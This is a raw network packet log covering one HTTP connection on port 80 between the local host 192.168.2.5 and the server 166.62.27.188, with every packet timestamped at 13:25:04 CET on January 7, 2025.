Jan 7, 2025 13:25:04.768629074 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768629074 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.768641949 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768657923 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.768677950 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.768699884 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769157887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769171953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769184113 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769213915 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769216061 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769227028 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769284010 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769340992 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769376993 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769383907 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769390106 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769432068 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769444942 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769459963 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769503117 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769522905 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769536018 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769546986 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769571066 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769603968 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769614935 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769628048 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769643068 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769692898 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769701958 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769706964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769717932 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769743919 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769797087 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769808054 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769824028 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769836903 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.769850016 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.769861937 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770020962 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770032883 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770045042 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770070076 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770073891 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770086050 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770102978 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770138025 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770159006 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770169973 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770186901 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770215988 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770231962 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770266056 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770276070 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770277977 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770318031 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770431042 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770452023 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770473957 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770494938 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770507097 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770522118 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770534039 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770545959 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770556927 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770570040 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770577908 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770600080 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770631075 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770642996 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770673037 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770679951 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770698071 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770716906 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770728111 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770755053 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770783901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770792961 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770801067 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770858049 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770875931 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770884991 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770925999 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.770934105 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770945072 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770965099 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.770976067 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771003962 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.771027088 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.771549940 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771565914 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771589994 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771600962 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771610975 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.771610975 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771658897 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.771682978 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771723032 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.771733999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771745920 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771779060 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771781921 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.771790981 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.771828890 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772011042 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772022009 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772033930 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772057056 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772095919 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772108078 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772120953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772134066 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772147894 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772167921 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772185087 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772192955 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772206068 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772213936 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772217035 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772257090 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772300959 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772314072 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772331953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772336006 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772345066 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772356033 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772365093 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772368908 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772407055 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772433996 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772444010 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772454977 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772479057 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772483110 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772490025 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772500992 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772511959 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772552967 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772562027 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772567034 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772578001 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772591114 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772602081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772605896 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772635937 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772651911 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772675037 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772686005 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772696972 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772735119 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772794962 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772809029 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772839069 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772845984 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772851944 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772864103 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772875071 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772881031 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772890091 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772912979 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772912979 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772923946 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772937059 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772937059 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772973061 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.772981882 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.772994041 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773006916 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773019075 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.773041010 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773042917 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.773051023 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773062944 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773099899 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.773102999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773116112 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773128033 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.773153067 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.773169994 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.773624897 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.858747005 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858767986 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858778954 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858793974 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858808041 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858819008 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858829975 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858834982 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.858846903 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.858870029 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.858887911 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.859049082 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859060049 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859072924 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859097004 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.859142065 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859152079 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859158993 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859164000 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859200954 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.859586954 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859596968 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859607935 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859635115 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859635115 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.859647036 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859661102 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.859672070 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859683990 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859693050 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.859703064 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.859729052 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860043049 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860089064 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860090971 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860100031 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860136032 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860181093 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860193968 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860205889 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860215902 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860228062 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860240936 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860259056 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860445023 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860506058 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860507011 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860522032 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860533953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860544920 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860567093 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860569000 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860579967 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860591888 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860596895 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860614061 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860634089 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860656977 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860657930 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860680103 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860690117 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860729933 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860735893 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860745907 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860764980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860770941 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860780954 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860797882 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860806942 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860814095 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860846043 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860857964 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860873938 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860894918 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860901117 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860918999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860934973 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860945940 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.860945940 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.860972881 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861093998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861104012 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861114979 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861139059 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861141920 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861150026 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861164093 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861164093 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861179113 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861186981 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861217976 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861217976 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861259937 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861334085 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861339092 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861350060 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861366034 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861378908 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861390114 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861401081 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861417055 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861428022 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861438990 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861438990 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.861449003 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.861546993 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862128973 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862195015 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862231016 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862238884 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862248898 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862266064 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862277985 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862289906 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862298012 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862309933 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862318993 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862329006 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862351894 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862353086 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862365007 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862390995 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862391949 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862401962 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862431049 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862437963 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862447977 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862458944 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862478971 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862483025 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862492085 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862492085 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862529993 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862540960 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862550974 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862591982 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862608910 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862620115 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862629890 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862641096 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862651110 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862685919 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862718105 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862732887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862756014 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862766027 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862776995 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862782955 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862787962 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862799883 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862799883 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862831116 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862839937 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862850904 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862888098 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862895012 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.862898111 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862909079 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.862925053 CET	49717	80	192.168.2.5	166.62.27.188
